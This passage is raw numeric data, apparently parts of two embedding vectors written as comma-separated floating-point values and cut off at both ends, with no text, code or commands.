17107315,-0.015189813,0.00043160276,-0.021080337,0.0028763404,-0.04196902,0.014929488,-0.008876987,-0.004782141,-0.011874928,-0.009767067,0.0067510065,0.04284167,-0.020433608,0.021196656,0.007963722,0.015962139,0.01075485,0.03838003,-0.013592282,-0.022437502,-0.009952005,0.012420329,-0.025679408,-0.02683992,0.003982742,-0.01566336,0.01168043,0.0012058433,-0.012932236,-0.016237041,0.005802491,-0.010352505,-0.017202748,0.028523313,-0.0016099114,-0.032139223,-0.02296552,0.01888793,0.006790616,0.02414473,-0.00076728786,-0.027817376,0.0014142529,0.0041054445,0.015402586,0.046532914,0.011717606,-0.02502434,-0.0049126456,0.00044775687,0.016729202,-0.038735833,0.0252196,-0.00879183,0.00481221,-0.030940825,-0.018349092,-0.009011704,0.016060961,-0.0358942,-0.00109105,0.0020440696,0.000059617232,-0.0011065898,0.0012640782,0.004050013,-0.011858013,0.035684135,-0.013609264,0.016988223,-0.0017498175,-0.012194381,0.013527124,-0.0248426,-0.031959906,0.0050418386,0.07129084,0.003964665,-0.0049277744,0.029415961,-0.006449318,0.005731949,0.016500318,-0.009025918,-0.0016172581,0.00012209636,-0.031537335,-0.002711378,0.00392463,0.017112449,-0.013558382,0.008653915,0.008584292,0.022929052,-0.0014330421,0.006818617,0.013063822,-0.01583775,-0.0067900796,0.034636777,0.0013202894,0.0036056847,0.012964068,0.011463526,0.00038858777,0.0015078514,-0.008864753,-0.024639929,-0.02620189,0.008051122,0.00206671,-0.037698817,-0.0266131,0.0029337003,-0.013736587,-0.014401184,0.017487317,0.010881276,0.01788225,-0.018283717,0.010667036,-0.027914545,-0.02798064,-0.0076860515,-0.006743871,-0.0049021617,0.004102759,0.0073562274,-0.014701294,-0.013770267,-0.00041890523,-0.014488848,-0.0020837267,-0.010207104,0.00081088516,-0.004383392,0.028888103,-0.008316103,-0.027761448,0.009300777,0.0003571186,0.0059307804,-0.008014451,-0.005674671,0.0059557925,0.010109428,-0.007979838,-0.011701933,-0.018069401,0.010513341,-0.00040754332,-0.01800162,-0.010845447,0.015773064,-0.005112553,0.022140605,0.0024476235,0.01718721,-0.0034237963,-0.0073429993,-0.023703627,-0.032709945,-0.021852445,0.035215683,-0.017911237,-0.0014020082,0.02355825,0.0093430495,0.010362313,-0.0057016374,0.0142229805,0.020557357,0.027990524,0.003966472,0.025183855,-0.005976955,0.019655127,0.002474381,0.0025856139,-0.016515765,0.0016783072,-0.0125457235,0.00043452022,0.01799965,0.024948714,-0.02013346,-0.0018251386,-0.028167259,0.0072148624,-0.021668768,-0.006901909,0.047842477,-0.01454578,0.016170107,0.030519461,-0.009462396,-0.0019841967,0.0073902123,0.013404831,-0.021712933,0.01803449,-0.017018126,0.021608396,0.0012151548,-0.016635621,0.0337142,0.0018154586,0.015533037,0.01032655,-0.00925225,0.0033562144,-0.017769186,0.025460437,0.010478989,-0.0005578883,0.014905917,-0.029721133,-0.022833759,-0.0046733622,-0.0062129623,-0.022568079,0.012213565,0.008342577,-0.0027932795,-0.028231649,-0.00847607,-0.023120651,0.02710325,-0.017641813,0.010547367,0.017121172,0.016525405,-0.007547207,-0.016335977,-0.016586946,-0.013251448,0.010246079,0.043719493,0.0016366336,-0.00023363713,-0.021720741,0.020708261,0.029354516,-0.0021137726,0.017872378,0.0012178823,-0.005397692,-0.014724722,0.0054787667,0.00038552043,0.005217607,-0.009655867,0.01284852,0.0060187452,-0.001572664,-0.0036576812,0.01363009,0.008511374,-0.0017255661,-0.00070789456,-0.0031879316,0.0041635213,-0.0023774542,0.027471434,-0.0079115415,0.016161682,-0.012003506,0.011631592,-0.009848998,-0.00015873193,-0.036129378,-0.016673975,0.022275563,-0.033353273,0.0024364903,-0.00026882064,0.014395443,0.023314843,-0.014537675,-0.015243589,-0.0022844889,0.0035365121,-0.0017790688,-0.029583061,-0.002423872,-0.01305592,-0.015774377,0.009494326,0.0022753081,0.013300343,0.008266287,-0.012535042,0.017833058,0.025360495,0.0009530147,-0.036974546,0.014606491,0.010098827,-0.0063807303,0.0074828346,-0.0016390448,-0.008196807,-0.023187952,0.05473618,-0.0122020785,-0.004608621,-0.0069199805,0.031290703,0.019490877,-0.014659235,0.00048562486,-0.019062096,-0.014183661,-0.016577847,-0.036905486,0.0056361305,-0.00083013537,-0.020262353,-0.008288024,0.02710293,-0.0064159124,0.0058348607,0.009120968,0.0049524475,-0.009824269,0.024974281,0.017882407,-0.013197492,-0.04741155,-0.01226304,0.020243548,-0.030369667,0.013077925,0.013652952,-0.016236313,-0.022414668,-0.009043741,-0.013967778,-0.006643261,-0.00588645,0.0007265203,0.022316337,0.004443847,0.019073019,-0.0007400316,-0.0020921666,0.015026788,-0.0030783033,-0.020365382,-0.005732269,-0.0033064955,-0.027385453,0.016374681,-0.018380297,0.0097318655,0.010882232,0.013322405,-0.023722585,0.016591957,0.011664887,0.006375177,0.004279924,0.010854627,0.013073913,-0.0072730733,-0.021743221,-0.021713357,0.016921917,0.0039666435,-0.02326917,-0.011141033,-0.008070903,-0.0050437837,-0.0041946135,0.010535871,0.005266183,0.01867606,-0.003804549,-0.019796394,0.016303347,-0.005159568,0.00045476295,0.016753418,-0.0047569196,0.0022509329,-0.0069326595,-0.027861807,0.017158031,0.017327687,-0.0038313519,0.011686493,-0.0073181293,0.019007897,0.045500666,0.006572181,0.008841275,0.00196899,-0.009583346,-0.005396497,-0.0034342676,-0.034712434,0.0058376254,-0.019631395,-0.018351827,-0.008284433,-0.019225065,-0.005083876,-0.029597929,0.0014611287,-0.09932937,0.003899633,-0.016665617,-0.022270015,-0.0049835877,-0.021395657,0.021470126,0.014281955,0.007715213,-0.039242003,-0.006684919,0.021389978,-0.001139378,-0.012148098,-0.014406425,0.0042196955,-0.029235855,-0.020242034,0.0008911876,0.0124154,0.0014349831,-0.009460205,-0.0022031034,-0.0073182755,0.002903712,0.0069539463,-0.0002581063,0.015725726,-0.0050895736,0.011163197,-0.0064269574,-0.005932108,0.0117739495,0.014724527,0.0067341737,0.00014007572,0.0014497818,-0.0021417136,0.006052547,-0.0047316523,-0.0043509933,-0.0071742483,0.009715986,0.0061612483,0.009512809,0.012187995,0.010210031,0.037183434,0.029985772,0.030069752,-0.00772841,-0.017279638,0.008831566,-0.0066084485,-0.026980877,-0.022124331,0.005202723,-0.0011312044,0.009817461,0.005163147,0.0016036159,-0.00027011853,-0.00049835606,-0.012273299,0.01140449,0.013194278,0.00041836704,-0.011052745,-0.042749956,0.0046578073,-0.011989941,0.029068718,-0.0024980218,0.003158717,-0.002364169,0.014531593,-0.0014637618,0.010716344,-0.016131684,0.020362165,-0.036060967,-0.014105856,0.00503713,0.024555478,-0.006510784,-0.032130167,0.0044745216,0.017232174,-0.01744185,0.011521029,-0.0018207298,0.0010641365,-0.0015253309,-0.006779037,-0.0069571813,0.016753802,-0.012055212,0.011048317,-0.0032967578,0.0014311031,-0.0014086182,0.004240023,-0.022795584,-0.023275794,-0.11521176,-0.00067508785,0.028231401,-0.015791792,-0.009480366,-0.011349623,0.017241327,0.002889006,0.040940292,0.012503,-0.02823629,0.011177268,-0.0140406415,-0.0026277946,0.0029583662,0.006590325,-0.03189969,-0.0044160793,0.0007198255,-0.016472233,0.0023531802,-0.02326079,-0.0008923862,0.0026684126,0.017335963,0.0054534595,0.020235896,0.022745533,0.039177444,-0.004504499,-0.0049749617,0.002382297,-0.0040196967,0.0074105905,-0.025117127,0.0010559943,0.0045222957,-0.021883966,-0.009503748,0.017727807,0.005172986,0.006988899,0.010545744,0.016701354,-0.009721938,-0.0048265024,-0.004833372,0.022106327,-0.0032192494,-0.018429527,0.0035511907,-0.0001305076,-0.0072213965,0.006419609,-0.014664202,-0.025868487,0.0055069905,0.010513697,0.012895907,0.012043651,-0.0030512249,0.004424201,-0.011361497,0.023922747,-0.0051252707,0.010793898,-0.011019278,0.013777216,0.0034714693,0.0077076047,-0.0072268043,0.0271931,0.0032683504,-0.009816315,0.023487763,-0.00075349293,0.02591428,0.020758923,0.01809963,-0.0032960535,0.013835774,-0.029892698,0.0072395685,0.012380152,-0.030208668,0.02098612,0.0014312095,0.0027861805,-0.007823013,0.009373967,0.018930765,0.013568072,-0.0088295555,0.012774865,0.02548877,0.0149576925,0.06099084,0.003940205,-0.018924538,-0.00518616,-0.009150359,-0.013443594,-0.014936164,-0.004701559,-0.032578584,0.010603993,0.04094699,-0.009579241,0.00083290297,-0.002764998,0.015192773,0.027223136,-0.01591406,-0.00431308,0.014668848,0.0049161254,-0.009215461,-0.018086655,-0.006226925,-0.010960186,0.027668202,0.008081085,0.001890497,-0.016115956,0.008575394,-0.015278057,-0.016056113,0.016084718,0.007090128,-0.04261333,0.006856988,-0.0044749975,0.010793047,-0.021732071,0.0070569827,0.007576002,-0.01030377,0.018484991,0.0029721921,0.02307504,0.01330293,0.009983831,-0.0071837865,-0.012366322,0.0072113685,0.010978412,-0.017350014,-0.019492542,-0.02468237,0.0103705535,-0.00024076524,-0.01789416,0.03110973,0.014321789,-0.005993887,0.005137793,-0.015856637,0.0033431675,-0.0017751636,0.016046278,-0.0076174573,0.030117996,0.02457708,-0.011351013,0.0068233185,-0.006836953,-0.0010891916,-0.0064450256,0.010883376,-0.0063919,-0.020742606,0.00350827,0.020153983,-0.054520898,0.010141726,0.017077945,-0.0002522534,0.013250584,0.031534776,0.020770127,-0.022269828,0.0124320965,-0.022347452,-0.010334091,0.02214158,0.020591384,-0.022443816,0.0065549174,-0.0063700066,-0.015764803,0.048719015,0.010470907,-0.014061995,-0.041403856,0.00865147,-0.0026002778,0.002039625,0.033590566,0.00656615,0.0036769183,-0.023713566,0.018566716,-0.0027566922,-0.014983412,-0.0034723375,0.0034608997,0.00073525606,0.03721704,0.0149538,-0.009250288,-0.009820162,0.0023201487,-0.002540654,0.0031430442,0.0111798365,0.0144963935,-0.019956455,-0.016207201,0.019366408,0.013049381,-0.0012535192,-0.03429777,0.017435592,-0.0017940169,-0.016326236,0.0368844,0.020621106,0.018055232,-0.034338854,-0.022512618,0.0050058514,0.012868393,-0.027449887,0.00011190781,0.00064158736,-0.011239326,0.011269887,0.01901543,0.010779076,0.014645374,0.0306135,0.009527029,0.020237764,0.015621777,0.018748993,-0.0073122084,0.011518967,0.004649693,0.030894151,0.040035117,0.0009232171,-0.008493933,-0.0037862002,-0.00031622977,-0.018352984,0.012787336,0.014023982,0.0006952478,-0.008628459,0.017992169,-0.028155915,0.0077278456,-0.027209312,-0.007896789,0.018012408,-0.004835061,0.0024418796,-0.022689376,0.0037350226,0.009615263,0.025371261,-0.0029188832,-0.009327445,0.037257843,-0.0009184552,-0.009147588,-0.0077010575,-0.0028220452,0.011027584,-0.0048454553,-0.01294601,-0.014331582,-0.0054414123,0.017793434,0.0026151899,0.017922454,-0.012409653,0.014383442,-0.023705857,-0.006767407,0.0041183997,-0.0076223533,0.008189384,-0.003406131,-0.0057419264,0.0034619146,-0.00075195386,-0.0027955072,0.0071206787,0.0063739493,0.015664835,-0.016305963,-0.020516979,-0.0061290613,0.014385013,-0.022938412,-0.00804945,0.020695942,0.00028457196,-0.01725675,-0.03666326,0.013516701,-0.011699731,0.0010707241,0.009103296,0.006451111,0.009659507,-0.003996811,-0.048624843,-0.019066928,-0.012873874,-0.0122222155,0.018841773,-0.012913004,-0.017299578,0.0034075207,0.005849014,0.024168298,-0.016131563,-0.012145662,0.021193674,-0.007959512,-0.012246386,-0.0042190016,0.013844268,-0.0045045963,0.007451087,0.033179227,-0.020260181,0.014318935,0.0061039254,0.0034196512,-0.0041681402,0.0024405282,0.00039781877,0.021680864,-0.009737915,0.00072958117,0.012308187,0.004976771,-0.008576713,-0.0050437083,-0.0032430228,-0.008356393,-0.020536719,0.02189279,-0.033975735,0.006229816,0.010196115,0.009651925,-0.007594778,0.012307466,-0.011025586,-0.023103585,-0.00093493034,-0.011827874,-0.014050067,0.003313587,-0.031297278,0.0053220135,-0.012601116,0.01281855,-0.021218413,-0.01833847,-0.014146478,-0.102352485,-0.0048914407,0.030996613,0.014719777,0.035764854,0.011045568,-0.019591944,-0.002861352,-0.02033658,0.022641307,0.011069882,-0.007155488,-0.021519853,0.009985376,0.025711667,0.007965741,-0.018497799,0.011829618,0.0034552552,-0.020658322,-0.012937705,0.0045708977,-0.020186683,-0.014691895,0.006185474,0.0019855066,-0.009707906,-0.017402748,-0.018943736,0.014445443,0.000017980215,-0.005908174,0.0031222566,-0.02044896,-0.007448088,0.006832913,-0.008109726,0.009884821,-0.02168972,-0.03894772,0.008284669,-0.0057114437,-0.004742599,-0.012283364,-0.028944453,0.017056387,-0.044902004,-0.009739192,-0.009655895,0.0102966875,0.0024379804,0.009825034,0.0049539846,0.029685495,-0.002756296,0.011125478,0.0044060494,-0.004928171,0.027398536,0.0011004345,-0.017050646,0.006959074,0.012234461,-0.0065059513,0.001970029,0.007688926,0.00065436645,0.01792488,0.0026170325,0.0036808823,0.0017799276,-0.017482357,-0.014001503,-0.031388257,-0.0040440117,0.01044987,0.015374311,-0.019977413,-0.0028330614,0.0085313115,0.03492722,-0.0048481952,0.027079202,0.013388439,0.01191746,0.019444266,0.0064083873,0.004689714,0.011662297,0.012199308,-0.033215508,-0.0040021483,0.036998633,0.012298878,0.010108454,-0.0019896517,0.004077584,0.009657543,0.002033558,0.010702417,-0.008937899,0.007699184,0.00006731509,-0.01646921,-0.005053449,0.007165122,-0.0058883494,-0.013900448,-0.018016871,-0.00795828,0.002919987,0.03805139,0.0310422,0.037463173,0.009907865,0.018825267,0.0063341754,0.012026664,-0.0011273744,-0.030799605,-0.02074269,-0.0014761118,-0.007834705,0.03078234,0.014480131,0.007111303,0.008808146,-0.009264176,-0.019147828,0.0028300781,-0.0072619393,0.02780438,-0.0019448394,0.0086401915,-0.012038891,-0.009422393,-0.028927032,0.02388012,0.02222942,0.03824741,0.0042140237,-0.040638916,-0.0050124247,-0.004735411,-0.031748466,0.025812533,-0.008833657,-0.0015085244,-0.005026666,-0.0060587605,-0.02250587,-0.00028061078,-0.0105757415,0.012235778,-0.010334059,-0.0014901726,-0.0063045975,-0.0055003865,-0.01760754,-0.00018373142,-0.010157802,0.019423058,-0.00270438,-0.007876658,-0.023009624,0.007955956,0.004680447,-0.009070841,-0.011878651,-0.017334333,-0.005338146,-0.021155126,0.0041022724,-0.0019183205,-0.0133102285,0.013707682,0.031428028,0.023131847,-0.014104183,0.0021480478,-0.027426861,-0.02175269,-0.020828553,-0.027443932,-0.0030046722,-0.008075451,-0.0016796418,-0.003611907,0.013366583,-0.0017260547,-0.009925587,-0.013040462,0.0059672417,-0.020943796,0.0020457243,-0.0196704,0.008589995,0.0032404263,-0.029299118,0.014903194,0.0008505373,0.01440255,-0.0109138945,0.013815432,0.039813127,0.026897395,-0.013324142,0.021948868,-0.0073389416,-0.017110374,-0.016047277,0.012253002,0.008546001,0.11083934,-0.006050873,-0.0112080425,0.00089289324,0.0025994605,-0.0063507287,0.012556971,0.0046703625,-0.003470316,0.00078243006,0.030462516,-0.015323344,0.022736182,-0.013651667,-0.01835344,0.02861023,0.008257768,-0.032645937,0.0076633883,-0.0033117856,0.02096531,-0.02306684,-0.023742521,-0.032692507,-0.0077287066,-0.07586846,0.03851112,0.019011201,-0.0009460381,0.027107026,0.025231361,0.005156375,0.0015801133,0.025404101,-0.009491946,0.006146725,0.0028307452,-0.011616818,0.00042777142,-0.013479537,0.024696868,0.0068581877,-0.0017049167,-0.0082025165,-0.0010215845,-0.023775473,0.007621103,0.0009960427,0.0062809973,-0.013050127,0.0054786266,-0.008788466,0.0076535624,0.004015225,0.01895479,-0.017417997,0.0006938259,0.0001676783,0.01662423,-0.008322878,0.0010689612,0.011081594,0.00874611,0.011621587,0.013314708,-0.004551215,-0.0033940175,-0.014532009,0.0046217125,-0.008949349,0.019078545,-0.014313999,0.002552291,-0.00031922336,0.0005133446,0.012526055,-0.007939348,-0.01221031,0.01776173,-0.0035751278,0.002638818,-0.01762639,0.0034229308,-0.016800053,0.0063163764,-0.006133567,-0.010956274,0.006125844,-0.0017474551,-0.014224231,-0.0068669813,0.020394303,0.018370634,0.017085267,-0.009246337,-0.00012596171,0.011436922,-0.016811302,-0.0032768175,0.0023759666,-0.008662234,-0.006164501,0.0046443595,0.020460298,-0.009500302,-0.013115596,0.0051555648,0.0154562155,-0.0018999217,-0.009104766,0.0012355897,0.02091894,0.010731863,0.017699044,0.005053034,0.028859602,-0.034416325,-0.014301006,0.028805226,-0.019565187,-0.01361794,0.004610222,0.0027383151,0.028441213,0.006928229,0.02607723,-0.00717649,-0.014129912,-0.005014053,-0.015656916,0.00810908,-0.024995817,0.002957646,0.01741085,0.005939781,0.014374839,0.03916472,0.0059588524,0.009845589,0.0056848745,0.0023103475,-0.018900918,0.007157678,0.00007838582,0.023750978,-0.028931165,0.026905723,-0.010132276,0.0020247477,-0.012387034,0.00024408691,0.0075827534,-0.014067594,0.00453099,-0.010226414,-0.017737508,0.0042207693,0.000018801196,-0.0048118215,-0.017979082,0.012685721,-0.0070767826,0.0073422124,-0.04491495,0.025875254,0.01684001,-0.0012921853,0.007879692,-0.0024255677,0.00030771393,-0.013275645,0.0016944165,0.009898382,0.006428686,-0.007820523,0.0037360578,0.0077278744,0.022392865,-0.0133234495,-0.00046988612,-0.0031131909,0.0035754335,-0.009390066,-0.00825777,0.019137697,-0.005136379,0.006262343,-0.013444582,-0.02154144,0.025511792,-0.0005071959,-0.0058677164,0.0017257617,-0.0002007367,-0.009974696,0.025480688,-0.026179355,0.024722435,-0.0183398,-0.052596185,-0.0048167133,0.009583708,0.020970138,-0.021536168,0.0073904814,-0.008687139,-0.004221243,-0.018611772,-0.005004339,0.000067971945,0.00679094,0.011027091,-0.01741686,-0.03569798,0.0028907533,0.011757654,-0.0086983135,-0.031102983,-0.0050270795,-0.009297543,0.014411764,0.0024946588,-0.00008657492,-0.001092632,0.015166203,-0.0019454785,-0.008359448,0.02798704,0.017877826,-0.034066334,-0.023323013,0.005866675,0.0016746932,0.00041869213,-0.003528275,-0.0017416748,0.02179619,0.021019,0.0033856088,0.009150281,-0.009408062,-0.004365557,0.01755143,0.0034634967,-0.010361364,0.012727498,-0.012477123,-0.03025562,-0.0028971264,-0.005641153,-0.03222526,0.0055247466,-0.016572159,-0.017289184,-0.03293016,0.007300493,-0.0022496348,0.02396716,0.004718137,-0.002853732,0.0010888317,0.017109014,-0.008420844,0.02813557,-0.0030309435,-0.011455276,0.011256961,-0.02329529,-0.0063741305,0.0050846157,0.000024758088,0.02475416,-0.005169182,0.031095654,-0.004972046,0.0033927143,-0.0019997184,-0.021483235,-0.0058755768,-0.0009904196,0.02090488,-0.009521121,-0.014669742,-0.021008242,-0.0074803196,-0.0007631453,-0.0074226516,0.027538368,0.03949547,-0.050849237,-0.0096863145,0.02273861,-0.005496138,-0.01308814,0.033831194,0.006688767,-0.031684004,-0.033277135,0.017202642,0.010292006,-0.0064897863,-0.0394662,-0.017667422,0.014784911,-0.015833627,0.00011418564,0.0014926892,-0.009605749,-0.012684727,0.0030283853,0.0016129744,0.00055153924,-0.01775478,-0.005514893,-0.004330087,-0.029943224,0.007001544,-0.011361852,-0.0043161903,0.020229727,0.022367297,-0.02156217,-0.007156861,0.014985845,-0.0018056711,0.015032365,0.00585399,-0.028975865,-0.028615428,-0.011482174,-0.0030024548,0.009267823,-0.014099911,-0.012667026,-0.02190475,0.0058554728,-0.00096745905,0.13392417,-0.0068120277,-0.0021584202,0.033199545,0.002828749,-0.009198773,0.0066051306,0.018735077,0.0022890547,0.016247276,0.032338206,0.0057568685,0.0057237567,0.03360465,-0.002225685,0.0031574143,0.005674516,0.13072695,-0.012632525,0.025447462,0.008935739,0.0004481662,0.0075166193,0.017464621,0.020090928,-0.06705691,0.0025435179,-0.03526264,-0.0060253,0.0022079253,-0.042493757,0.0103406105,-0.01025192,-0.004577736,-0.0051419702,0.008060846,-0.00031082644,-0.00073436473,-0.019098327,-0.0017875405,0.024832623,-0.01033262,-0.024491422,0.011805891,-0.022613171,0.0056781224,-0.023588926,-0.0011572697,0.00053020223,0.023405777,0.024903493,-0.0014982718,0.015520795,-0.010812386,0.015085957,0.009460425,0.0040469402,-0.0023683822,-0.043638725,0.014528633,-0.0035594415,0.0015510762,-0.01173785,0.03448931,-0.012225964,-0.010124692,-0.014389894,-0.0014287846,0.005964983,0.029522466,0.023870792,-0.00011607906,-0.010530464,-0.008601459,0.03392504,0.011652711,-0.0076283244,0.018924976,0.010182633,-0.008130993,0.035571393,0.012558998,-0.0162125,0.007966605,0.014222057,0.008339652,-0.0017180033,0.0018126025,0.026789038,-0.0021909452,0.0021175784,-0.009954818,-0.021379909,0.017187225,0.0133217145,0.037489884,0.002614541,-0.0005526358,0.023595758,0.0004288789,-0.005047557,0.023439046,0.00086104363,-0.014069434,-0.0066268686,0.013334252,-0.006241164,-0.03757726,-0.005207043,0.004158525,0.019578652,-0.0018635271,-0.009236115,0.020921096,-0.008127183,-0.0047609922,-0.009013995,0.003237697,-0.037916064,0.0011400776,-0.0055355593,-0.00052588753,-0.00031676004,0.010625139,-0.019861704,-0.0077019758,0.004899203,0.029505078,-0.0065734913,-0.010628867,-0.022556214,-0.01235727,0.015904304,0.07080363,0.0010585051,-0.01691813,0.030801428,-0.04461431,-0.020571657,-0.008585825,0.005295762,0.011657825,0.00460281,0.0021833486,-0.0039189216,-0.00048580096,-0.002316329,-0.000009891496],[-0.00035615856,0.0091146985,-0.010307108,-0.0012353612,0.013260867,-0.024787415,-0.007021392,0.009197743,-0.007898557,-0.008388965,0.0016894425,0.017317249,0.0033177685,0.010365159,-0.008448522,0.005529508,0.020045826,-0.0035517123,-0.014269951,-0.0010602381,0.0027888648,0.0008780913,0.013465257,-0.008138403,-0.0018138621,0.0011514726,-0.007094602,0.017476756,0.0060144225,0.015818737,-0.0020062411,0.013878452,0.02719543,-0.0070104813,0.0026790283,-0.008228077,-0.009991782,-0.028422324,-0.0012530962,-0.004124466,0.000976345,0.012787387,-0.009567685,0.007600554,-0.010501016,0.0050052023,0.0010057444,0.024698202,-0.019090988,0.018189305,-0.0066747866,-0.0012371591,-0.016744968,0.012192936,-0.007615322,0.014820749,-0.0009869824,-0.026151437,0.0071679014,-0.00027849837,-0.005222177,-0.0059535187,-0.013771525,-0.009508408,0.038134865,0.0031371226,0.0016983846,-0.0020532547,-0.004409841,-0.026407227,-0.012088712,-0.002109966,0.01814065,-0.00530644,0.029424943,0.0089331735,0.0024965378,-0.010107169,-0.0031222024,0.01966238,-0.01202015,-0.0033004803,0.0072471285,-0.0042321384,0.014679277,0.0017393917,-0.0102682,-0.010538893,-0.006002902,-0.03643447,-0.005253324,0.007993821,0.011331141,-0.0032510832,-0.006163392,0.0071466137,0.008455693,-0.013300684,0.008764357,0.014292363,-0.0076106153,-0.0053089187,-0.046264663,0.01404871,0.011860676,-0.022107933,-0.009203084,-0.0018755374,-0.014297947,-0.012089528,0.0033618389,0.012883313,-0.0008193897,0.005403733,0.01051472,-0.017090416,0.0027735555,0.0113271205,-0.014831765,0.003588466,-0.015809622,0.023566596,-0.00019084506,-0.009913967,0.007236599,-0.013063653,-0.011603931,-0.0003835761,-0.0019046656,0.007894154,-0.009980119,0.016735788,0.009837626,-0.016005883,0.010460899,-0.0029936186,-0.0054624476,-0.013594667,-0.009797863,-0.0074500423,0.01766821,-0.004712817,0.0021829866,0.0009793701,0.02620719,0.031011734,-0.0035654844,0.012006697,0.012455366,-0.023905378,0.0031403229,0.007272073,-0.012970863,-0.02959049,-0.006239494,0.022310244,0.00056932087,-0.01395946,-0.017822912,-0.01256703,-0.023551622,-0.0014016139,-0.0024699687,-0.006826475,-0.022614779,-0.041738436,-0.0068478994,0.009132322,0.0045066015,-0.0035650372,0.0035267381,0.019616902,0.018975379,-0.0026125617,0.011749293,0.012811267,0.00017611752,-0.01010468,-0.009193495,-0.01046186,0.0013728229,0.017912937,-0.016809542,0.007435384,0.0016249383,0.027227812,0.027048483,-0.02460059,-0.027490282,-0.012562221,0.02036689,-0.015563174,0.0015595607,0.0022236742,-0.0025388573,-0.02225426,-0.011878974,0.11430283,-0.0014466433,0.0065541985,-0.0152267115,0.0060284683,0.006391281,-0.028850406,-0.011025013,-0.015211988,-0.006038026,-0.026667329,0.018369569,-0.014765756,0.0033755328,-0.007147763,-0.00070343714,-0.0018579651,0.021316795,-0.053414483,0.00585948,0.015515754,0.0007105075,0.011790122,-0.013283651,0.008660271,0.0068142395,-0.020933755,-0.0138811385,-0.015707675,0.017096171,-0.0015820537,0.014442937,-0.0040933774,0.018003996,0.0117960125,-0.013344899,-0.017734837,0.008181207,-0.0056264824,0.0050646756,-0.0067602955,-0.007455967,-0.0074272538,-0.009546163,-0.005802857,0.019436052,0.03985063,-0.0047271857,0.0080235815,0.023414273,0.01897767,-0.014109434,0.01146379,0.0056318236,-0.022158027,-0.001895936,0.007951734,-0.010352134,-0.009215069,-0.004959353,0.0021736315,-0.001820357,0.0015396414,0.01135669,0.023834584,0.0111871585,0.023666477,0.029985406,-0.008045843,0.01834329,-0.03113995,-0.014663124,0.015307807,-0.02373321,0.0016371422,-0.012970384,0.0056817075,0.008584538,-0.00779993,0.026927384,0.01790544,0.022985503,-0.0045944233,-0.0012592655,0.0067771752,0.010158339,-0.022721685,-0.01852474,0.004228293,-0.012863826,0.018446336,0.031224284,-0.014722615,0.008572088,0.007853514,0.015073467,-0.0024630195,-0.019402096,-0.013500478,-0.026456714,0.0018912101,0.017230004,-0.01073364,-0.004270255,-0.0055705453,0.016524106,-0.0032788767,-0.0009190097,-0.0037099486,0.0011756042,0.039358817,0.0019233896,0.02874822,-0.038798083,-0.005786029,-0.014596536,-0.00633932,-0.0033667337,0.0019109744,-0.010635462,-0.012164404,-0.011921351,-0.0022789252,0.008267971,-0.018031666,-0.013567993,-0.032746978,-0.01585401,0.0003269925,0.00599198,-0.025199315,0.023174671,-0.001891486,-0.013300418,0.014205424,0.022821886,0.008667633,-0.004065477,0.028777938,-0.009032578,0.023937598,0.008327743,0.018786317,-0.018417377,-0.020547122,-0.010119916,0.022627959,0.0054980493,-0.015287038,-0.008477804,0.0016922663,0.014938513,-0.0027284247,0.021398293,-0.008647074,0.0020964858,-0.020302678,-0.038604215,0.008804121,-0.003818722,-0.019399887,0.018478317,-0.01984773,0.016321931,-0.0032548741,-0.017846776,0.012089005,0.073979944,-0.019786948,0.0041434052,-0.00081256573,-0.03024501,-0.0077124955,0.028562134,0.028360547,-0.0025130515,0.009505556,-0.021133093,-0.017358871,0.009448535,-0.008229544,-0.029711245,0.023426997,-0.00848534,-0.017348344,-0.015396916,0.007047624,0.036594454,-0.01445588,0.017537544,0.026877498,0.011277044,0.017064173,0.015720319,-0.0028675017,0.005501155,-0.012961461,-0.00022742641,-0.0027045384,-0.008276925,-0.002234781,-0.053187355,0.010558697,-0.0018070767,0.0145807965,-0.00950032,-0.009325224,0.0075110467,0.0002943549,0.00027566313,-0.014394883,-0.00981454,0.019052168,0.007753546,-0.015374164,-0.020336956,0.022958873,0.012242416,0.022200098,-0.015800428,0.015896002,0.004485214,0.009458735,0.008543489,-0.038379807,0.03911236,0.016382435,0.008492411,0.0069203465,0.008955265,-0.003405765,-0.009545954,0.012076434,-0.015669541,0.002595611,0.01176776,-0.0065250276,-0.00019588364,0.010463514,-0.010349051,0.007757733,-0.013799016,0.015696775,0.011813437,-0.009750483,0.00022721988,0.0098808855,-0.022339512,0.018101677,0.01462347,-0.019265695,-0.005854919,0.011061629,-0.0054022796,0.015744135,0.012709916,-0.0030361193,-0.021182587,0.013086587,0.025165081,0.008803521,0.0301435,0.037762273,0.012590912,0.017189557,-0.011125644,0.0057323226,0.0071515758,-0.018875398,-0.009450347,0.0034970369,0.0047136447,0.003024913,0.002330212,0.0021545312,0.006426311,0.03173091,-0.019934086,0.0025240574,-0.00020834671,-0.027386384,0.0035463865,-0.024329882,0.0020911996,0.0016062554,-0.016440252,-0.006276812,0.024267029,0.0066142217,0.0098613035,0.01727927,0.021063687,0.01419193,-0.008659056,-0.008169611,-0.009278733,0.0127482815,-0.013038427,0.030444125,0.018081967,-0.019959895,0.031653844,0.004589299,-0.011070079,-0.031620856,0.019459328,0.00070154096,0.016837647,0.0247083,0.03126019,-0.0137798535,0.016257988,0.01623899,0.037805997,0.0038270354,-0.020173084,0.0061358027,0.0016287819,-1.2920876e-7,0.00025449565,-0.0061691524,-0.0056637125,0.006112838,0.034197528,-0.025723342,0.0063790106,0.0034935288,0.022699162,-0.01897969,-0.0066615962,0.0021575296,-0.018097658,0.019058773,0.016056657,0.06042395,-0.023472894,-0.029705834,-0.0021664002,0.026562648,-0.0011173938,-0.015885856,0.012450188,-0.012686689,0.01816789,0.0143850455,0.036200784,0.010839698,0.023774927,-0.029517855,-0.002635948,-0.0045404155,0.010553235,-0.0069459784,0.010405939,-0.002229221,-0.0049784593,0.0064771143,-0.01048545,-0.018053718,-0.0030401424,0.02486016,-0.002250898,-0.015980858,-0.014732952,-0.033549994,-0.0006072163,0.022572337,-0.012818082,0.0026833022,0.004773947,0.007715506,0.0022085302,-0.0125984335,0.039293163,-0.003250415,0.015418007,0.0046403,0.014242633,0.019101907,-0.005744779,-0.0038071114,0.010502907,0.031079592,-0.00031729325,0.0058461837,0.034609206,0.024095362,0.004516434,-0.01718515,0.012176365,0.014469834,0.011091447,-0.01852202,0.025557118,-0.0022451244,-0.00887849,-0.012556839,0.013569713,-0.012419973,0.012816624,0.0058500515,-0.011037768,-0.0032690389,-0.021433813,-0.013418327,0.00942933,-0.0090082595,-0.022723585,0.024819633,0.0033637239,-0.010742591,0.040153746,0.010270498,-0.019498076,-0.0044530802,0.014876108,0.00248292,-0.0069097527,0.012265879,-0.017216237,0.0032387904,0.005882112,-0.0018549053,0.0058396026,0.01549